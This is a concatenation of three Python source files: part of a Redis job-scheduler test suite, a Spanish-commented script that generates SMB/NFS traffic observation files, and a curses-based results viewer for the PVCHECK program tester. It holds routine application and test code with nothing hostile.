tl(self.testconn.zrange(self.scheduler.scheduled_jobs_key, 0, 1)))
self.assertEqual(self.testconn.zscore(self.scheduler.scheduled_jobs_key, job.id),
to_unix(right_now + time_delta))
time_delta = timedelta(hours=1)
job = self.scheduler.enqueue_in(time_delta, say_hello)
self.assertEqual(self.testconn.zscore(self.scheduler.scheduled_jobs_key, job.id),
to_unix(right_now + time_delta))
def test_enqueue_in_sets_timeout(self):
"""
Ensure that a job scheduled via enqueue_in can be created with
a custom timeout.
"""
timeout = 13
job = self.scheduler.enqueue_in(timedelta(minutes=1), say_hello, timeout=timeout)
job_from_queue = Job.fetch(job.id, connection=self.testconn)
self.assertEqual(job_from_queue.timeout, timeout)
def test_enqueue_in_sets_job_id(self):
"""
Ensure that a job scheduled via enqueue_in can be created with
a custom job id.
"""
job_id = 'test_id'
job = self.scheduler.enqueue_in(timedelta(minutes=1), say_hello, job_id=job_id)
self.assertEqual(job.id, job_id)
def test_enqueue_in_sets_job_ttl(self):
"""
Ensure that a job scheduled via enqueue_in can be created with a custom job ttl.
"""
job_ttl = 123456789
job = self.scheduler.enqueue_in(timedelta(minutes=1), say_hello, job_ttl=job_ttl)
self.assertEqual(job.ttl, job_ttl)
def test_enqueue_in_sets_job_result_ttl(self):
"""
Ensure that a job scheduled via enqueue_in can be created with a custom result ttl.
"""
job_result_ttl = 1234567890
job = self.scheduler.enqueue_in(timedelta(minutes=1), say_hello, job_result_ttl=job_result_ttl)
self.assertEqual(job.result_ttl, job_result_ttl)
def test_enqueue_in_sets_meta(self):
"""
Ensure that a job scheduled via enqueue_in sets meta.
"""
meta = {'say': 'hello'}
job = self.scheduler.enqueue_in(timedelta(minutes=1), say_hello, meta=meta)
self.assertEqual(job.meta, meta)
def test_count(self):
now = datetime.utcnow()
self.scheduler.enqueue_at(now, say_hello)
self.assertEqual(self.scheduler.count(), 1)
future_time = now + timedelta(hours=1)
future_test_time = now + timedelta(minutes=59, seconds=59)
self.scheduler.enqueue_at(future_time, say_hello)
self.assertEqual(self.scheduler.count(timedelta(minutes=59, seconds=59)), 1)
self.assertEqual(self.scheduler.count(future_test_time), 1)
self.assertEqual(self.scheduler.count(), 2)
def test_get_jobs(self):
"""
Ensure get_jobs() returns all jobs until the specified time.
"""
now = datetime.utcnow()
job = self.scheduler.enqueue_at(now, say_hello)
self.assertIn(job, self.scheduler.get_jobs(now))
future_time = now + timedelta(hours=1)
job = self.scheduler.enqueue_at(future_time, say_hello)
self.assertIn(job, self.scheduler.get_jobs(timedelta(hours=1, seconds=1)))
self.assertIn(job, [j[0] for j in self.scheduler.get_jobs(with_times=True)])
self.assertIsInstance(list(self.scheduler.get_jobs(with_times=True))[0][1], datetime)
self.assertNotIn(job, self.scheduler.get_jobs(timedelta(minutes=59, seconds=59)))
def test_get_jobs_slice(self):
"""
Ensure get_jobs() returns the appropriate slice of all jobs using offset and length.
"""
now = datetime.utcnow()
future_time = now + timedelta(hours=1)
future_test_time = now + timedelta(minutes=59, seconds=59)
# Schedule each job a second later than the previous job,
# otherwise Redis will return jobs that have the same scheduled time in
# lexicographical order (not the order in which we enqueued them)
now_jobs = [self.scheduler.enqueue_at(now + timedelta(seconds=x), say_hello)
for x in range(15)]
future_jobs = [self.scheduler.enqueue_at(future_time + timedelta(seconds=x), say_hello)
for x in range(15)]
expected_slice = now_jobs[5:] + future_jobs[:10] # last 10 from now_jobs and first 10 from future_jobs
expected_until_slice = now_jobs[5:] # last 10 from now_jobs
jobs = self.scheduler.get_jobs()
jobs_slice = self.scheduler.get_jobs(offset=5, length=20)
jobs_until_slice = self.scheduler.get_jobs(future_test_time, offset=5, length=20)
self.assertEqual(now_jobs + future_jobs, list(jobs))
self.assertEqual(expected_slice, list(jobs_slice))
self.assertEqual(expected_until_slice, list(jobs_until_slice))
def test_get_jobs_to_queue(self):
"""
Ensure that jobs scheduled the future are not queued.
"""
now = datetime.utcnow()
job = self.scheduler.enqueue_at(now, say_hello)
self.assertIn(job, self.scheduler.get_jobs_to_queue())
future_time = now + timedelta(hours=1)
job = self.scheduler.enqueue_at(future_time, say_hello)
self.assertNotIn(job, self.scheduler.get_jobs_to_queue())
def test_enqueue_job(self):
"""
When scheduled job is enqueued, make sure:
- Job is removed from the sorted set of scheduled jobs
- "enqueued_at" attribute is properly set
- Job appears in the right queue
- Queue is recognized by rq's Queue.all()
"""
now = datetime.utcnow()
queue_name = 'foo'
scheduler = Scheduler(connection=self.testconn, queue_name=queue_name)
job = scheduler.enqueue_at(now, say_hello)
self.scheduler.enqueue_job(job)
self.assertNotIn(job, tl(self.testconn.zrange(scheduler.scheduled_jobs_key, 0, 10)))
job = Job.fetch(job.id, connection=self.testconn)
self.assertTrue(job.enqueued_at is not None)
queue = scheduler.get_queue_for_job(job)
self.assertIn(job, queue.jobs)
queue = Queue.from_queue_key('rq:queue:{0}'.format(queue_name))
self.assertIn(job, queue.jobs)
self.assertIn(queue, Queue.all())
def test_enqueue_job_with_scheduler_queue(self):
"""
Ensure that job is enqueued correctly when the scheduler is bound
to a queue object and job queue name is not provided.
"""
queue = Queue('foo', connection=self.testconn)
scheduler = Scheduler(connection=self.testconn, queue=queue)
job = scheduler._create_job(say_hello)
scheduler_queue = scheduler.get_queue_for_job(job)
self.assertEqual(queue, scheduler_queue)
scheduler.enqueue_job(job)
self.assertTrue(job.enqueued_at is not None)
self.assertIn(job, queue.jobs)
self.assertIn(queue, Queue.all())
def test_enqueue_job_with_job_queue_name(self):
"""
Ensure that job is enqueued correctly when queue_name is provided
at job creation
"""
queue = Queue('foo', connection=self.testconn)
job_queue = Queue('job_foo', connection=self.testconn)
scheduler = Scheduler(connection=self.testconn, queue=queue)
job = scheduler._create_job(say_hello, queue_name='job_foo')
self.assertEqual(scheduler.get_queue_for_job(job), job_queue)
scheduler.enqueue_job(job)
self.assertTrue(job.enqueued_at is not None)
self.assertIn(job, job_queue.jobs)
self.assertIn(job_queue, Queue.all())
def test_enqueue_at_with_job_queue_name(self):
"""
Ensure that job is enqueued correctly when queue_name is provided
to enqueue_at
"""
queue = Queue('foo', connection=self.testconn)
job_queue = Queue('job_foo', connection=self.testconn)
scheduler = Scheduler(connection=self.testconn, queue=queue)
job = scheduler.enqueue_at(datetime.utcnow(), say_hello, queue_name='job_foo')
self.assertEqual(scheduler.get_queue_for_job(job), job_queue)
self.scheduler.enqueue_job(job)
self.assertTrue(job.enqueued_at is not None)
self.assertIn(job, job_queue.jobs)
self.assertIn(job_queue, Queue.all())
def test_job_membership(self):
now = datetime.utcnow()
job = self.scheduler.enqueue_at(now, say_hello)
self.assertIn(job, self.scheduler)
self.assertIn(job.id, self.scheduler)
self.assertNotIn("non-existing-job-id", self.scheduler)
def test_cancel_scheduled_job(self):
"""
When scheduled job is canceled, make sure:
- Job is removed from the sorted set of scheduled jobs
"""
# schedule a job to be enqueued one minute from now
time_delta = timedelta(minutes=1)
job = self.scheduler.enqueue_in(time_delta, say_hello)
# cancel the scheduled job and check that it's gone from the set
self.scheduler.cancel(job)
self.assertNotIn(job.id, tl(self.testconn.zrange(
self.scheduler.scheduled_jobs_key, 0, 1)))
def test_change_execution_time(self):
"""
Ensure ``change_execution_time`` is called, ensure that job's score is updated
"""
job = self.scheduler.enqueue_at(datetime.utcnow(), say_hello)
new_date = datetime(2010, 1, 1)
self.scheduler.change_execution_time(job, new_date)
self.assertEqual(to_unix(new_date),
self.testconn.zscore(self.scheduler.scheduled_jobs_key, job.id))
self.scheduler.cancel(job)
self.assertRaises(ValueError, self.scheduler.change_execution_time, job, new_date)
def test_args_kwargs_are_passed_correctly(self):
"""
Ensure that arguments and keyword arguments are properly saved to jobs.
"""
job = self.scheduler.enqueue_at(datetime.utcnow(), simple_addition, 1, 1, 1)
self.assertEqual(job.args, (1, 1, 1))
job = self.scheduler.enqueue_at(datetime.utcnow(), simple_addition, z=1, y=1, x=1)
self.assertEqual(job.kwargs, {'x': 1, 'y': 1, 'z': 1})
job = self.scheduler.enqueue_at(datetime.utcnow(), simple_addition, 1, z=1, y=1)
self.assertEqual(job.kwargs, {'y': 1, 'z': 1})
self.assertEqual(job.args, (1,))
time_delta = timedelta(minutes=1)
job = self.scheduler.enqueue_in(time_delta, simple_addition, 1, 1, 1)
self.assertEqual(job.args, (1, 1, 1))
job = self.scheduler.enqueue_in(time_delta, simple_addition, z=1, y=1, x=1)
self.assertEqual(job.kwargs, {'x': 1, 'y': 1, 'z': 1})
job = self.scheduler.enqueue_in(time_delta, simple_addition, 1, z=1, y=1)
self.assertEqual(job.kwargs, {'y': 1, 'z': 1})
self.assertEqual(job.args, (1,))
def test_interval_and_repeat_persisted_correctly(self):
"""
Ensure that interval and repeat attributes are correctly saved.
"""
job = self.scheduler.schedule(datetime.utcnow(), say_hello, interval=10, repeat=11)
job_from_queue = Job.fetch(job.id, connection=self.testconn)
self.assertEqual(job_from_queue.meta['interval'], 10)
self.assertEqual(job_from_queue.meta['repeat'], 11)
def test_crontab_persisted_correctly(self):
"""
Ensure that crontab attribute gets correctly saved in Redis.
"""
# create a job that runs one minute past each whole hour
job = self.scheduler.cron("1 * * * *", say_hello)
job_from_queue = Job.fetch(job.id, connection=self.testconn)
self.assertEqual(job_from_queue.meta['cron_string'], "1 * * * *")
# get the scheduled_time and convert it to a datetime object
unix_time = self.testconn.zscore(self.scheduler.scheduled_jobs_key, job.id)
datetime_time = from_unix(unix_time)
# check that minute=1, seconds=0, and is within an hour
assert datetime_time.minute == 1
assert datetime_time.second == 0
assert datetime_time - datetime.utcnow() < timedelta(hours=1)
def test_crontab_persisted_correctly_with_local_timezone(self):
"""
Ensure that crontab attribute gets correctly saved in Redis when using local TZ.
"""
# create a job that runs one minute past each whole hour
job = self.scheduler.cron("0 15 * * *", say_hello, use_local_timezone=True)
job_from_queue = Job.fetch(job.id, connection=self.testconn)
self.assertEqual(job_from_queue.meta['cron_string'], "0 15 * * *")
# get the scheduled_time and convert it to a datetime object
unix_time = self.testconn.zscore(self.scheduler.scheduled_jobs_key, job.id)
datetime_time = from_unix(unix_time)
expected_datetime_in_local_tz = datetime.now(get_utc_timezone()).replace(hour=15,minute=0,second=0,microsecond=0)
assert datetime_time.time() == expected_datetime_in_local_tz.astimezone(get_utc_timezone()).time()
def test_crontab_rescheduled_correctly_with_local_timezone(self):
# Create a job with a cronjob_string
job = self.scheduler.cron("1 15 * * *", say_hello, use_local_timezone=True)
# change crontab
job.meta['cron_string'] = "2 15 * * *"
# reenqueue the job
self.scheduler.enqueue_job(job)
# get the scheduled_time and convert it to a datetime object
unix_time = self.testconn.zscore(self.scheduler.scheduled_jobs_key, job.id)
datetime_time = from_unix(unix_time)
expected_datetime_in_local_tz = datetime.now(get_utc_timezone()).replace(hour=15,minute=2,second=0,microsecond=0)
assert datetime_time.time() == expected_datetime_in_local_tz.astimezone(get_utc_timezone()).time()
def test_crontab_sets_timeout(self):
"""
Ensure that a job scheduled via crontab can be created with
a custom timeout.
"""
timeout = 13
job = self.scheduler.cron("1 * * * *", say_hello, timeout=timeout)
job_from_queue = Job.fetch(job.id, connection=self.testconn)
self.assertEqual(job_from_queue.timeout, timeout)
def test_crontab_sets_id(self):
"""
Ensure that a job scheduled via crontab can be created with
a custom id
"""
job_id = "hello-job-id"
job = self.scheduler.cron("1 * * * *", say_hello, id=job_id)
job_from_queue = Job.fetch(job.id, connection=self.testconn)
self.assertEqual(job_id, job_from_queue.id)
def test_crontab_sets_default_result_ttl(self):
"""
Ensure that a job scheduled via crontab gets proper default
result_ttl (-1) periodic tasks.
"""
job = self.scheduler.cron("1 * * * *", say_hello)
job_from_queue = Job.fetch(job.id, connection=self.testconn)
self.assertEqual(-1, job_from_queue.result_ttl)
def test_crontab_sets_description(self):
"""
Ensure that a job scheduled via crontab can be created with
a custom description
"""
description = 'test description'
job = self.scheduler.cron("1 * * * *", say_hello, description=description)
job_from_queue = Job.fetch(job.id, connection=self.testconn)
self.assertEqual(description, job_from_queue.description)
def test_repeat_without_interval_raises_error(self):
# Ensure that an error is raised if repeat is specified without interval
def create_job():
self.scheduler.schedule(datetime.utcnow(), say_hello, repeat=11)
self.assertRaises(ValueError, create_job)
def test_job_with_intervals_get_rescheduled(self):
"""
Ensure jobs with interval attribute are put back in the scheduler
"""
time_now = datetime.utcnow()
interval = 10
job = self.scheduler.schedule(time_now, say_hello, interval=interval)
self.scheduler.enqueue_job(job)
self.assertIn(job.id,
tl(self.testconn.zrange(self.scheduler.scheduled_jobs_key, 0, 1)))
self.assertEqual(self.testconn.zscore(self.scheduler.scheduled_jobs_key, job.id),
to_unix(time_now) + interval)
def test_job_with_interval_can_set_meta(self):
"""
Ensure that jobs with interval attribute can be created with meta
"""
time_now = datetime.utcnow()
interval = 10
meta = {'say': 'hello'}
job = self.scheduler.schedule(time_now, say_hello, interval=interval, meta=meta)
self.scheduler.enqueue_job(job)
self.assertEqual(job.meta, meta)
def test_job_with_crontab_get_rescheduled(self):
# Create a job with a cronjob_string
job = self.scheduler.cron("1 * * * *", say_hello)
# current unix_time
old_next_scheduled_time = self.testconn.zscore(self.scheduler.scheduled_jobs_key, job.id)
# change crontab
job.meta['cron_string'] = "2 * * * *"
# enqueue the job
self.scheduler.enqueue_job(job)
self.assertIn(job.id,
tl(self.testconn.zrange(self.scheduler.scheduled_jobs_key, 0, 1)))
# check that next scheduled time has changed
self.assertNotEqual(old_next_scheduled_time,
self.testconn.zscore(self.scheduler.scheduled_jobs_key, job.id))
# check that new next scheduled time is set correctly
expected_next_scheduled_time = to_unix(get_next_scheduled_time("2 * * * *"))
self.assertEqual(self.testconn.zscore(self.scheduler.scheduled_jobs_key, job.id),
expected_next_scheduled_time)
def test_job_with_repeat(self):
"""
Ensure jobs with repeat attribute are put back in the scheduler
X (repeat) number of times
"""
time_now = datetime.utcnow()
interval = 10
# If job is repeated once, the job shouldn't be put back in the queue
job = self.scheduler.schedule(time_now, say_hello, interval=interval, repeat=1)
self.scheduler.enqueue_job(job)
self.assertNotIn(job.id,
tl(self.testconn.zrange(self.scheduler.scheduled_jobs_key, 0, 1)))
# If job is repeated twice, it should only be put back in the queue once
job = self.scheduler.schedule(time_now, say_hello, interval=interval, repeat=2)
self.scheduler.enqueue_job(job)
self.assertIn(job.id,
tl(self.testconn.zrange(self.scheduler.scheduled_jobs_key, 0, 1)))
self.scheduler.enqueue_job(job)
self.assertNotIn(job.id,
tl(self.testconn.zrange(self.scheduler.scheduled_jobs_key, 0, 1)))
def test_missing_jobs_removed_from_scheduler(self):
"""
Ensure jobs that don't exist when queued are removed from the scheduler.
"""
job = self.scheduler.schedule(datetime.utcnow(), say_hello)
job.cancel()
list(self.scheduler.get_jobs_to_queue())
self.assertIn(job.id, tl(self.testconn.zrange(
self.scheduler.scheduled_jobs_key, 0, 1)))
job.delete()
list(self.scheduler.get_jobs_to_queue())
self.assertNotIn(job.id, tl(self.testconn.zrange(
self.scheduler.scheduled_jobs_key, 0, 1)))
def test_periodic_jobs_sets_result_ttl(self):
"""
Ensure periodic jobs set result_ttl to infinite.
"""
job = self.scheduler.schedule(datetime.utcnow(), say_hello, interval=5)
job_from_queue = Job.fetch(job.id, connection=self.testconn)
self.assertEqual(job.result_ttl, -1)
def test_periodic_jobs_sets_ttl(self):
"""
Ensure periodic jobs sets correctly ttl.
"""
job = self.scheduler.schedule(datetime.utcnow(), say_hello, interval=5, ttl=4)
job_from_queue = Job.fetch(job.id, connection=self.testconn)
self.assertEqual(job.ttl, 4)
def test_periodic_jobs_sets_meta(self):
"""
Ensure periodic jobs sets correctly meta.
"""
meta = {'say': 'hello'}
job = self.scheduler.schedule(datetime.utcnow(), say_hello, interval=5, meta=meta)
self.assertEqual(meta, job.meta)
def test_periodic_job_sets_id(self):
"""
Ensure that ID is passed to RQ by schedule.
"""
job = self.scheduler.schedule(datetime.utcnow(), say_hello, interval=5, id='id test')
job_from_queue = Job.fetch(job.id, connection=self.testconn)
self.assertEqual('id test', job.id)
def test_periodic_job_sets_description(self):
"""
Ensure that description is passed to RQ by schedule.
"""
job = self.scheduler.schedule(datetime.utcnow(), say_hello, interval=5, description='description')
job_from_queue = Job.fetch(job.id, connection=self.testconn)
self.assertEqual('description', job.description)
def test_run(self):
"""
Check correct signal handling in Scheduler.run().
"""
def send_stop_signal():
"""
Sleep for 1 second, then send a INT signal to ourself, so the
signal handler installed by scheduler.run() is called.
"""
time.sleep(1)
os.kill(os.getpid(), signal.SIGINT)
thread = Thread(target=send_stop_signal)
thread.start()
self.assertRaises(SystemExit, self.scheduler.run)
thread.join()
def test_run_burst(self):
"""
Check burst mode of Scheduler.run().
"""
now = datetime.utcnow()
job = self.scheduler.enqueue_at(now, say_hello)
self.assertIn(job, self.scheduler.get_jobs_to_queue())
self.assertEqual(len(list(self.scheduler.get_jobs())), 1)
self.scheduler.run(burst=True)
self.assertEqual(len(list(self.scheduler.get_jobs())), 0)
def test_scheduler_w_o_explicit_connection(self):
"""
Ensure instantiating Scheduler w/o explicit connection works.
"""
s = Scheduler()
self.assertEqual(s.connection, self.testconn)
def test_small_float_interval(self):
"""
Test that scheduler accepts 'interval' of type float, less than 1 second.
"""
key = Scheduler.scheduler_key
lock_key = '%s_lock' % Scheduler.scheduler_key
self.assertNotIn(key, tl(self.testconn.keys('*')))
scheduler = Scheduler(connection=self.testconn, interval=0.1) # testing interval = 0.1 second
self.assertEqual(scheduler._interval, 0.1)
#acquire lock
self.assertTrue(scheduler.acquire_lock())
self.assertIn(lock_key, tl(self.testconn.keys('*')))
self.assertEqual(self.testconn.ttl(lock_key), 10) # int(0.1) + 10 = 10
#enqueue a job
now = datetime.utcnow()
job = scheduler.enqueue_at(now, say_hello)
self.assertIn(job, self.scheduler.get_jobs_to_queue())
self.assertEqual(len(list(self.scheduler.get_jobs())), 1)
#remove the lock
scheduler.remove_lock()
#test that run works with the small floating-point interval
def send_stop_signal():
"""
Sleep for 1 second, then send a INT signal to ourself, so the
signal handler installed by scheduler.run() is called.
"""
time.sleep(1)
os.kill(os.getpid(), signal.SIGINT)
thread = Thread(target=send_stop_signal)
thread.start()
self.assertRaises(SystemExit, scheduler.run)
thread.join()
#all jobs must have been scheduled during 1 second
self.assertEqual(len(list(scheduler.get_jobs())), 0)
def test_get_queue_for_job_with_job_queue_name(self):
"""
Tests that scheduler gets the correct queue for the job when
queue_name is provided.
"""
queue = Queue('scheduler_foo', connection=self.testconn)
job_queue = Queue('job_foo', connection=self.testconn)
scheduler = Scheduler(connection=self.testconn, queue=queue)
job = scheduler._create_job(say_hello, queue_name='job_foo')
self.assertEqual(scheduler.get_queue_for_job(job), job_queue)
def test_get_queue_for_job_without_job_queue_name(self):
"""
Tests that scheduler gets the scheduler queue for the job
when queue name is not provided for that job.
"""
queue = Queue('scheduler_foo', connection=self.testconn)
scheduler = Scheduler(connection=self.testconn, queue=queue)
job = scheduler._create_job(say_hello)
self.assertEqual(scheduler.get_queue_for_job(job), queue)
|
main_app_host.py
|
#!/usr/bin/env python3
from traffic_generator_host import TrafficGeneratorHost
from load_files_helper import LoadFilesHelper
import multiprocessing
import argparse
import os
import shutil
# Se puede cambiar la duracion de los intervalos
# pero cabe recalcar que el estudio se ha hecho para intervalos de 5 minutos
parser = argparse.ArgumentParser(description='Lanza el generador observaciones(muestras de operaciones para los clientes de w/r) de '
'tráfico SMB/NFS')
parser.add_argument("-tt", "--total_time", default=8, type=int, help="Total execution time, in hours, default: 8")
parser.add_argument("-it", "--interval_time", default=5, type=int, help="Interval time, in minutes, default: 5")
## del tipo ya se ve que numero deusuarios se quiere crear
parser.add_argument("-tc", "--type_clients", default="1,0,0", type=str, help="Type of clients, default: 1,0,0; "
"e.g: 1,2,0 -> this means 1 of type 0, "
"2 of type 1 ,etc. or 9 only -> 9 type 0 ")
args = parser.parse_args()
interval_duration = args.interval_time
total_time = args.total_time
tipos_usuario = args.type_clients
# Carga de ficheros del programa
load_files_helper = LoadFilesHelper()
# Crea el array con todos los tipos de usuario que se necesitan instanciar, ej. [1 1 2 0] -> 2 tipo 1, 1 tipo 2 y 1
# tipo 0
def process_tipos_usario_arg(param):
param_split = param.split(',')
arr = []
indice_user = 0
for item in param_split:
if int(item) > 0:
arr += [indice_user] * int(item)
indice_user += 1
return arr
def create_generator(id_cliente, tipo_usuario):
generador = TrafficGeneratorHost(load_files_helper, id_cliente, tipo_usuario, total_time * 3600,
interval_duration * 60)
generador.start()
## TODO:revisar si esta funcion es util, ya que creo se borra con bash la carpeta, aunque esta sirve para debug
def delete_observaciones_folder():
folder = os.path.join(os.getcwd(), "observaciones")
for filename in os.listdir(folder):
file_path = os.path.join(folder, filename)
try:
if os.path.isfile(file_path) or os.path.islink(file_path):
os.unlink(file_path)
elif os.path.isdir(file_path):
shutil.rmtree(file_path)
except Exception as e:
print('Failed to delete %s. Reason: %s' % (file_path, e))
def start():
delete_observaciones_folder()
arr_usuarios = process_tipos_usario_arg(tipos_usuario)
## TODO: este for debe cambiar por un array que sería una lista con todos lo stipos de usuarios
## Esta i es para controlar la reproducibilidad de las trazas
i = 0
for item in arr_usuarios:
# TODO: Se puede utilizar el multiprocessing para generar las observaciones en menos tiempo
# pero hay que decidir como configurar las semillas ya que random utiliza como semilla
# el tiempo del sistema y crea observaciones iguales para todos los clientes
# multiprocessing.Process(target=create_generator, args=(i,)).start()
print('Creando ficheros observación para cliente_' + str(i))
create_generator(i, item)
i += 1
start()
|
interactiveformatter.py
|
# -*- coding: utf-8 -*-
"""Interactive interface."""
import curses
import threading
import formatter
import executor
import functools
import i18n
_ = i18n.translate
# TODO: i18n
# TODO: refactoring with Formatter + separate UI class
HELP_MESSAGE = """
PVCHECK automatic verification of computer programs
===================================================
Keybord controls:
RIGHT switch to the next test in the suite
LEFT switch to the previous test in the suite
DOWN, n scroll one line down
UP, p scroll one line up
PgDN scroll one page down
PgUP scroll one page up
HOME scroll to the beginning
END scroll to the end
r redraw the screen
q, ESC close the program
s show a summary of the results
i show info about the test case
o show the program's output
h, ? show this page
"""
HELP_MESSAGE_IT = """
PVCHECK verifica automatica di programmi
===================================================
Controlli tramite tastiera
DESTRA passa al test successivo nella suite
SINISTRA passa al test precedente nella suite
GIU`, n scorre una riga in giu`
SU, p scorre una riga in su
PgDN scorre una pagina in giu`
PgUP scorre una pagina in su
HOME scorre all'inizio
END scorre alla fine
r ridisegna lo schermo
q, ESC chiude il programma
s mostra un riepilogo dei risultati
i mostra informazioni sul caso di test
o mostra l'output del programma
h, ? mostra questa pagina
"""
i18n.register_translation(HELP_MESSAGE, "it", HELP_MESSAGE_IT)
_CALLBACKS = {}
def _register_key(*keys):
"""Decorator registering key->callback pairs.
Keys can be strings or character codes."""
def decorator(f):
for k in keys:
if isinstance(k, str):
k = ord(k)
_CALLBACKS[k] = f
return f
return decorator
def _synchronized(f):
"""Makes the calls to the method acquire a lock owned by the class instance."""
@functools.wraps(f)
def decorated(self, *args, **kwargs):
with self._mutex:
return f(self, *args, **kwargs)
return decorated
class InteractiveFormatter(formatter.Formatter):
"""Formatter that uses curses to report the result."""
FOOTER_H = 2 # height of the footer
MAX_W = 512 # max line length
COLOR_OK = 1
COLOR_WARN = 2
COLOR_ERR = 3
_RESULT_TABLE = {
executor.ER_OK: None,
executor.ER_TIMEOUT: _("TIMEOUT EXPIRED: PROCESS TERMINATED"),
executor.ER_OUTPUT_LIMIT: _("TOO MANY OUTPUT LINES"),
executor.ER_SEGFAULT: _("PROCESS ENDED WITH A FAILURE (SEGMENTATION FAULT)"),
executor.ER_ERROR: ("PROCESS ENDED WITH A FAILURE (ERROR CODE {status})"),
executor.ER_NOTFILE: _("FAILED TO RUN THE FILE '{progname}' the file does not exist)")
}
def __init__(self):
"""Create the interactive formatter."""
self._reports = []
self._report_index = 0
self._screen = None
self._mutex = threading.Lock()
self._initialization_barrier = None
self._sections = []
self._err_counts = {}
self._warn_counts = {}
self._ok_counts = {}
self._error_count = 0
self._warn_count = 0
self._ok_count = 0
@_register_key("q", "Q", 27) # 27 -> ESC
def _quit(self):
self._stop = True
@_register_key("p", "P", curses.KEY_UP)
def scroll_line_up(self):
self._reports[self._report_index].scroll(self._text_height(), -1)
self._update()
@_register_key("n", "N", curses.KEY_DOWN, 10) # 10 -> ENTER
def scroll_line_down(self):
self._reports[self._report_index].scroll(self._text_height(), 1)
self._update()
@_register_key(curses.KEY_PPAGE)
def scroll_page_up(self):
self._reports[self._report_index].scroll(self._text_height(), pages=-1)
self._update()
@_register_key(curses.KEY_NPAGE)
def scroll_page_down(self):
self._reports[self._report_index].scroll(self._text_height(), pages=1)
self._update()
@_register_key(curses.KEY_HOME)
def scroll_begin(self):
self._reports[self._report_index].scroll(self._text_height(), documents=-1)
self._update()
@_register_key(curses.KEY_END)
def scroll_end(self):
self._reports[self._report_index].scroll(self._text_height(), documents=1)
self._update()
@_register_key("r", "R", curses.KEY_RESIZE)
def resize_terminal(self):
self._update()
@_register_key(curses.KEY_LEFT)
def previous_report(self):
self._screen.clear()
if len(self._reports) > 1:
self._report_index = max(self._report_index - 1, 1)
self._update()
@_register_key(curses.KEY_RIGHT)
def next_report(self):
self._screen.clear()
self._report_index = min(self._report_index + 1, len(self._reports) - 1)
self._update()
@_register_key("h", "H", "?")
def next_report(self):
self._screen.clear()
self._show_info(_(HELP_MESSAGE))
self._screen.clear()
self._update()
@_register_key("i", "I")
def next_report(self):
self._screen.clear()
doc = self._reports[self._report_index]
self._show_info(doc.info())
self._screen.clear()
self._update()
@_register_key("o", "O")
def next_report(self):
self._screen.clear()
doc = self._reports[self._report_index]
text = _("PROGRAM'S OUTPUT:")
self._show_info(text + "\n" + doc.output)
self._screen.clear()
self._update()
@_register_key("s", "S")
def next_report(self):
self._screen.clear()
doc = self._reports[self._report_index]
text = [_("SUMMARY:"), ""]
for s in self._sections:
line = "%20s %3d ok %3d warnings %3d errors" % (s, self._ok_counts[s], self._warn_counts[s], self._err_counts[s])
text.append(line)
text.append(" ")
self._show_info("\n".join(text))
self._screen.clear()
self._update()
def _thread_body(self):
"""UI thread."""
curses.wrapper(self._main_loop)
def _main_loop(self, screen):
"""Main loop managing the interaction with the user."""
# First setup curses
self._screen = screen
curses.use_default_colors()
curses.init_pair(self.COLOR_OK, curses.COLOR_GREEN, -1)
curses.init_pair(self.COLOR_WARN, curses.COLOR_YELLOW, -1)
curses.init_pair(self.COLOR_ERR, curses.COLOR_RED, -1)
self._footer = curses.newwin(self.FOOTER_H, self._text_width(), self._text_height(), 0)
self._footer.bkgd(" ", curses.A_REVERSE)
self._reports.append(Report("PVCHECK", self.MAX_W))
self._reports[-1].add_line("Waiting for test results...")
self._report_index = 0
self._update()
self._stop = False
# This reactivate the main thread
self._initialization_barrier.wait()
# Event loop
while not self._stop:
ch = screen.getch()
with self._mutex:
_CALLBACKS.get(ch, lambda self: None)(self)
def _text_height(self):
"""Number of text lines displayed."""
return self._screen.getmaxyx()[0] - self.FOOTER_H
def _text_width(self):
"""Width of the displayed text."""
return min(self._screen.getmaxyx()[1], self.MAX_W)
def _add_footer(self, line, align, text, *extra):
"""Add some text in the footer."""
k = self._text_width() - 1 - len(text)
pos = max(0, (0 if align == "left" else (k if align == "right" else k //2 )))
self._footer.addnstr(line, pos, text, self._text_width() - 1 - pos, *extra)
def _add_short_report(self):
"""Insert ok, warnings, errors counters in the footer."""
texts = [
"%3d " % self._ok_count, " %s, " % _("passes"),
"%3d " % self._warn_count, " %s, " % _("warnings"),
"%3d " % self._err_count, " %s" % _("errors")
]
styles = [
[curses.color_pair(self.COLOR_OK)], [],
[curses.color_pair(self.COLOR_WARN)], [],
[curses.color_pair(self.COLOR_ERR)], []
]
n = self._text_width() - 1
pos = 0
for t, s in zip (texts, styles):
self._footer.addnstr(1, pos, t, n, *s)
pos += len(t)
n -= len(t)
def _update(self):
"""Redraw everything."""
if self._screen is None:
return
self._screen.refresh()
height = self._text_height()
width = self._text_width()
doc = self._reports[self._report_index]
self._footer.mvwin(height, 0)
doc.refresh(self._text_height(), self._text_width())
self._footer.clear()
self._add_footer(0, "center", _("[Press 'h' for help]"), curses.A_DIM)
text = _("Test case %d of %d (%s)") % (self._report_index, len(self._reports) - 1, doc.title) + " "
self._add_footer(0, "left", text)
text = _("Lines %d-%d/%d") % (doc.top(), doc.bottom(height), doc.length())
self._add_footer(0, "right", text)
self._add_short_report()
if self._running:
tot = self._err_count + self._warn_count + self._ok_count
text = _("TEST RUNNING") + "..." + "|/-\\"[tot % 4]
else:
text = _("TEST COMPLETED")
self._add_footer(1, "right", text, curses.A_BOLD)
self._footer.refresh()
def _show_info(self, text):
"""Show some text on the screen temporarily disabling the main interface."""
self._screen.refresh()
lines = text.splitlines()
content_pad = curses.newpad(len(lines), 1 + max(map(len, lines)))
for n, line in enumerate(lines):
content_pad.addstr(n, 0, line)
start_line = 0
while True:
height, width = self._screen.getmaxyx()
start_line = max(0, start_line)
start_line = min(len(lines) - height, start_line)
content_pad.refresh(start_line, 0, 0, 0, height - 1, width - 1)
ch = self._screen.getch()
if ch in (curses.KEY_DOWN, ord("n"), ord("N")):
start_line += 1
elif ch in (curses.KEY_UP, ord("p"), ord("P")):
start_line -= 1
elif ch == curses.KEY_NPAGE:
start_line += height
elif ch == curses.KEY_PPAGE:
start_line -= height
elif ch == curses.KEY_END:
start_line += len(lines)
elif ch == curses.KEY_HOME:
start_line = 0
else:
break
# -- Formatter interface --------------------------------------------------
def begin_session(self):
self._err_count = self._warn_count = self._ok_count = 0
self._running = True
# Start the UI thread
self._initialization_barrier = threading.Barrier(2)
self._thread = threading.Thread(target=self._thread_body)
self._thread.start()
self._initialization_barrier.wait()
def end_session(self):
# Wait the termination of the UI thread
with self._mutex:
self._running = False
self._update()
self._thread.join()
@_synchronized
